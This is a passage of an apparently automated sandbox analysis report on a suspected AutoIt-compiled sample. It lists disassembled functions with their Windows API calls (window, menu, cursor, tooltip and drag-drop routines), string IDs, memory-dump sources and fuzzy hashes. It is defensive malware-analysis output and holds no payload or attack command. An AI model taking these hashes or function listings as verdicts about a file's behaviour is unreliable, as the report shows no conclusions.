                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00F68E3D
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F68E87
                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F68EB4
                                                                                                                            • DrawMenuBar.USER32(?), ref: 00F68EC3
                                                                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00F68EEB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1073566785-4108050209
                                                                                                                            • Opcode ID: 3e0f7284c4566d7d9190cf0aee54b575acb33f9b80c3dafd4e7f987a69abfb68
                                                                                                                            • Instruction ID: 5fe28f083cd27946c2fafd954f76f1d6b948668b22c7a35ab3571a0a5f6328bd
                                                                                                                            • Opcode Fuzzy Hash: 3e0f7284c4566d7d9190cf0aee54b575acb33f9b80c3dafd4e7f987a69abfb68
                                                                                                                            • Instruction Fuzzy Hash: 47E17271900219AFDF20DF50CC84EEE7B79EF09760F10825AF925AA191DB758985FF60
                                                                                                                            Function 00F6488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCursorPos.USER32(?), ref: 00F649CA
                                                                                                                            • GetDesktopWindow.USER32 ref: 00F649DF
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00F649E6
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F64A48
                                                                                                                            • DestroyWindow.USER32(?), ref: 00F64A74
                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F64A9D
                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F64ABB
                                                                                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F64AE1
                                                                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00F64AF6
                                                                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F64B09
                                                                                                                            • IsWindowVisible.USER32(?), ref: 00F64B29
                                                                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F64B44
                                                                                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F64B58
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00F64B70
                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00F64B96
                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00F64BB0
                                                                                                                            • CopyRect.USER32(?,?), ref: 00F64BC7
                                                                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00F64C32
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                                            • API String ID: 698492251-4156429822
                                                                                                                            • Opcode ID: 6a2ccf31c8578afac8845c1e2b803c157a4e7e9e7123dcbd841c274570aa7e80
                                                                                                                            • Instruction ID: 0f067b36ce1a6fe5bdddd9401ae7e0eb6b2489a92568441c0f110b6c9619738e
                                                                                                                            • Opcode Fuzzy Hash: 6a2ccf31c8578afac8845c1e2b803c157a4e7e9e7123dcbd841c274570aa7e80
                                                                                                                            • Instruction Fuzzy Hash: 6AB1AD71608340AFDB04EF65D844B6ABBE4FF88310F008A1CF999AB2A1D775EC05DB95
                                                                                                                            Function 00EE27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EE28BC
                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00EE28C4
                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EE28EF
                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00EE28F7
                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00EE291C
                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EE2939
                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00EE2949
                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EE297C
                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EE2990
                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00EE29AE
                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00EE29CA
                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EE29D5
                                                                                                                              • Part of subcall function 00EE2344: GetCursorPos.USER32(?), ref: 00EE2357
                                                                                                                              • Part of subcall function 00EE2344: ScreenToClient.USER32(00FA57B0,?), ref: 00EE2374
                                                                                                                              • Part of subcall function 00EE2344: GetAsyncKeyState.USER32(00000001), ref: 00EE2399
                                                                                                                              • Part of subcall function 00EE2344: GetAsyncKeyState.USER32(00000002), ref: 00EE23A7
                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,00EE1256), ref: 00EE29FC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                            • API String ID: 1458621304-248962490
                                                                                                                            • Opcode ID: f64a5a16e78c748c8136fa05a9943d3d14738c839f71a365e09d40afe424e166
                                                                                                                            • Instruction ID: 959581e89b4a1a26d32180b3a1c5b25e4bef3d2dde4acc851b46ebddd77abac5
                                                                                                                            • Opcode Fuzzy Hash: f64a5a16e78c748c8136fa05a9943d3d14738c839f71a365e09d40afe424e166
                                                                                                                            • Instruction Fuzzy Hash: ACB14B71A4024EEFDB14DFA9DC45BED7BA8FB08714F105229FA16E7290DB749840EB50
                                                                                                                            Function 00F63DE2 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00F63E6F
                                                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F63F2F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharMessageSendUpper
                                                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                            • API String ID: 3974292440-719923060
                                                                                                                            • Opcode ID: c2ad98476d861777da92cea2a0229421406b18456a80e959f11cf77e50efc669
                                                                                                                            • Instruction ID: b7fb5bef8898f2db37a6259f829530c57d5819d8c10f572a547a1a7ff6c4a1c0
                                                                                                                            • Opcode Fuzzy Hash: c2ad98476d861777da92cea2a0229421406b18456a80e959f11cf77e50efc669
                                                                                                                            • Instruction Fuzzy Hash: 87A19E316143419BCB08FF14C852B6AB3E6AF45324F14482CF8A69B2D3DB75ED05EB51
                                                                                                                            Function 00F3A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00F3A47A
                                                                                                                            • __swprintf.LIBCMT ref: 00F3A51B
                                                                                                                            • _wcscmp.LIBCMT ref: 00F3A52E
                                                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F3A583
                                                                                                                            • _wcscmp.LIBCMT ref: 00F3A5BF
                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00F3A5F6
                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00F3A648
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00F3A67E
                                                                                                                            • GetParent.USER32(?), ref: 00F3A69C
                                                                                                                            • ScreenToClient.USER32(00000000), ref: 00F3A6A3
                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00F3A71D
                                                                                                                            • _wcscmp.LIBCMT ref: 00F3A731
                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00F3A757
                                                                                                                            • _wcscmp.LIBCMT ref: 00F3A76B
                                                                                                                              • Part of subcall function 00F0362C: _iswctype.LIBCMT ref: 00F03634
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                            • String ID: %s%u
                                                                                                                            • API String ID: 3744389584-679674701
                                                                                                                            • Opcode ID: 8eec52dc3c78d59c4e6d4676c4d26c38369288797f0383ec59d3c41cce280cdb
                                                                                                                            • Instruction ID: 90b53d42ed5b8e7108d30b80d30a959e1a4b080db1f7000b4376513b476feb9e
                                                                                                                            • Opcode Fuzzy Hash: 8eec52dc3c78d59c4e6d4676c4d26c38369288797f0383ec59d3c41cce280cdb
                                                                                                                            • Instruction Fuzzy Hash: 08A1E131604706AFD714DF65C884FAAB7E8FF44324F048629F9E9C21A0DB34E955EB92
                                                                                                                            Function 00F3AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 00F3AF18
                                                                                                                            • _wcscmp.LIBCMT ref: 00F3AF29
                                                                                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 00F3AF51
                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00F3AF6E
                                                                                                                            • _wcscmp.LIBCMT ref: 00F3AF8C
                                                                                                                            • _wcsstr.LIBCMT ref: 00F3AF9D
                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00F3AFD5
                                                                                                                            • _wcscmp.LIBCMT ref: 00F3AFE5
                                                                                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 00F3B00C
                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00F3B055
                                                                                                                            • _wcscmp.LIBCMT ref: 00F3B065
                                                                                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 00F3B08D
                                                                                                                            • GetWindowRect.USER32(00000004,?), ref: 00F3B0F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                            • String ID: @$ThumbnailClass
                                                                                                                            • API String ID: 1788623398-1539354611
                                                                                                                            • Opcode ID: a91186d5798b73da23fb11abfc01a12aaabc0d0d1c98f9cb07adb4322a1d1a16
                                                                                                                            • Instruction ID: f72ad5b532ecfa205516394f794f8c3180abfe19187907bdb9ca61f645e10d07
                                                                                                                            • Opcode Fuzzy Hash: a91186d5798b73da23fb11abfc01a12aaabc0d0d1c98f9cb07adb4322a1d1a16
                                                                                                                            • Instruction Fuzzy Hash: B881D3715083099FDB04DF21C895FAA77D8EF44334F048469FE959A0A2DB34DD49EBA2
                                                                                                                            Function 00F3ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsnicmp
                                                                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                            • API String ID: 1038674560-1810252412
                                                                                                                            • Opcode ID: 979844f7ef08663d07b37550abede1a270ba93e88d49e7e3a1242960be33f2a1
                                                                                                                            • Instruction ID: 43b38215cdef4932b3b4bca75dd98feb3d86a19615aadb2435db4f16a8be8169
                                                                                                                            • Opcode Fuzzy Hash: 979844f7ef08663d07b37550abede1a270ba93e88d49e7e3a1242960be33f2a1
                                                                                                                            • Instruction Fuzzy Hash: 4B31A231A48309A6EB14FA52DE03EEE77A4AF10771F601019F482711E5EF59AF04F657
                                                                                                                            Function 00F54FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00F55013
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00F5501E
                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00F55029
                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00F55034
                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00F5503F
                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00F5504A
                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00F55055
                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00F55060
                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00F5506B
                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00F55076
                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00F55081
                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00F5508C
                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00F55097
                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00F550A2
                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00F550AD
                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00F550B8
                                                                                                                            • GetCursorInfo.USER32(?), ref: 00F550C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cursor$Load$Info
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2577412497-0
                                                                                                                            • Opcode ID: ccae024938d18b8a0fab7fdf9b7166ffb0d7e1652f19dd20daddb3f83cf9d092
                                                                                                                            • Instruction ID: 66b7b1fa1eb6064ffab7787d3d83f8a9e3cbda7f40e7444e4842922e3cd482f0
                                                                                                                            • Opcode Fuzzy Hash: ccae024938d18b8a0fab7fdf9b7166ffb0d7e1652f19dd20daddb3f83cf9d092
                                                                                                                            • Instruction Fuzzy Hash: 2C3113B1D0831E6ADF109FB68C8996FBFE8FF04760F50452AE50CE7280DA78A5058F91
                                                                                                                            Function 00F6A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F6A259
                                                                                                                            • DestroyWindow.USER32(?,?), ref: 00F6A2D3
                                                                                                                              • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F6A34D
                                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F6A36F
                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F6A382
                                                                                                                            • DestroyWindow.USER32(00000000), ref: 00F6A3A4
                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EE0000,00000000), ref: 00F6A3DB
                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F6A3F4
                                                                                                                            • GetDesktopWindow.USER32 ref: 00F6A40D
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00F6A414
                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F6A42C
                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F6A444
                                                                                                                              • Part of subcall function 00EE25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EE25EC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                            • String ID: 0$tooltips_class32
                                                                                                                            • API String ID: 1297703922-3619404913
                                                                                                                            • Opcode ID: 50981ec37d4e9b272faf5e728a5fc1cd5c2c4c7ec69250f7ce5c64f77e292632
                                                                                                                            • Instruction ID: 02575c334a7b58d7e64d1646d362e3315b73bc94f303184e662132009559cbc9
                                                                                                                            • Opcode Fuzzy Hash: 50981ec37d4e9b272faf5e728a5fc1cd5c2c4c7ec69250f7ce5c64f77e292632
                                                                                                                            • Instruction Fuzzy Hash: DE71BC71540208AFD720CF28CC49F6A7BE6FB89710F04452CF995A72A1DBB5E906EF52
                                                                                                                            Function 00F6C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00F6C627
                                                                                                                              • Part of subcall function 00F6AB37: ClientToScreen.USER32(?,?), ref: 00F6AB60
                                                                                                                              • Part of subcall function 00F6AB37: GetWindowRect.USER32(?,?), ref: 00F6ABD6
                                                                                                                              • Part of subcall function 00F6AB37: PtInRect.USER32(?,?,00F6C014), ref: 00F6ABE6
                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00F6C690
                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F6C69B
                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F6C6BE
                                                                                                                            • _wcscat.LIBCMT ref: 00F6C6EE
                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F6C705
                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00F6C71E
                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00F6C735
                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00F6C757
                                                                                                                            • DragFinish.SHELL32(?), ref: 00F6C75E
                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F6C851
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                            • API String ID: 169749273-3440237614
                                                                                                                            • Opcode ID: 68d4cda0fe89581d8fa805d76c253158c6b018cf5cc648428ce56232606a934f
                                                                                                                            • Instruction ID: 0d039a92246cc2de93949354fd69d8c06e6bb02b0999883ebceb64fa0a2ce530
                                                                                                                            • Opcode Fuzzy Hash: 68d4cda0fe89581d8fa805d76c253158c6b018cf5cc648428ce56232606a934f
                                                                                                                            • Instruction Fuzzy Hash: 49619C71508344AFC701EF64DC85DAFBBE8EF89750F00092EF5A5921B1DB719909DB92
                                                                                                                            Function 00F64392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00F64424
                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F6446F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
